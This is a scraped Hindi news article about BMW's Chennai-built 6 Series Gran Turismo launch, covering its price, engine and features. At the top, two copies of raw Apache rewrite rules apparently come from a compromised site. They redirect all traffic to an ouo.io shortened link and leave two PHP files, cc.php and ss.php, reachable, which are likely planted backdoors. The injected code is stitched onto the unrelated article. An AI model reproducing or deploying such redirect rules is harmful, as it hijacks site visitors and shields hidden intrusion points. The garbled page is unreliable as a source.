
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 532
Previous Nextनई दिल्ली। BMW ने भारत में अपने चेन्नई प्लांट से BMW 6 सीरीज ग्रैन टूरिज्मो उतारी है। BMW की इस कार को हाल में ऑटो एक्सपो 2018 में लॉन्च किया गया था। 6 सीरीज ग्रैन टूरिज्मो को लोकली प्रॉड्यूस्ड पेट्रोल वैरिएंट (BMW 630i Gran Turismo Sport Line) में लॉन्च किया गया है। BMW 6 सीरीज ग्रैन टूरिज्मो की कीमत 58.90 लाख रुपये है।
BMW ग्रुप प्लांट चेन्नई के मैनेजिंग डायरेक्टर जोशन स्टालकैंप ने बताया कि 'BMW 6 सीरीज ग्रैन टूरिज्मो न केवल यूनीक कॉन्सेप्ट है, बल्कि इसने एडवांस्ड इंजीनियरिंग, टेक्नोलॉजी और इनोवेशंस के जरिए एक अलग मुकाम बनाया है। इस कार को अब स्थानीय स्तर पर ही बनाया जा रहा है। यह एक अलग तरह का सेगमेंट बनाएगी और इंडियन लग्जरी कार सेगमेंट में नया बेंचमार्क तय करेगी।'
BMW के चेन्नई प्लांट में BMW 3 सीरीज, BMW 3 सीरीज ग्रैन टूरिज्मो, BMW 5 सीरीज और BMW 7 सीरीज, BMW X1 और BMW X5 कारें बनती हैं। अब कंपनी के पोर्टफोलियो में BMW 6 सीरीज ग्रैन टूरिज्मो भी जुड़ गई है।
कंपनी 2018 में MINI Countryman का लोकल प्रॉडक्शन भी शुरू करेगी। BMW 6 सीरीज ग्रैन टूरिज्मो अभी केवल पेट्रोल वैरिएंट में आ रही है। कंपनी 2018 के आखिर में इसका डीजल मॉडल लॉन्च करेगी।
6 सीरीज GT पेट्रोल में 2.0 लीटर फोर सिलेंडर इंजन है। यह इंजन 1,550-4,400 rpm पर 258hp का पावर और 400Nm का टॉर्क जेनरेट करता है। इसमें 8 स्पीड स्टेपट्रॉनिक स्पोर्ट ऑटोमैटिक ट्रांसमिशन है। BMW की यह कार 6.3 सेकेंड में 0-100 किलोमीटर की रफ्तार पकड़ लेती है।
कार में लंबा बोनट है। इसका व्हीलबेस 3,070mm का है। कार में फ्रेमलेस विंडो के साथ डोर हैं। कार में 610 लीटर की बूट कैपेसिटी है, जो कि इसके पिछले मॉडल से 110 लीटर ज्यादा है। यह कार डिस्प्ले, नैविगेशन के साथ कंट्रोल सिस्टम, कम्युनिकेशंस और इंफोटेनमेंट फंक्शन से लैस है। कार में एयरबैग्स, एंटी-लॉक ब्रेकिंग सिस्टम (ABS), डायनामिक स्टेबिलिटी कंट्रोल जैसे फीचर हैं।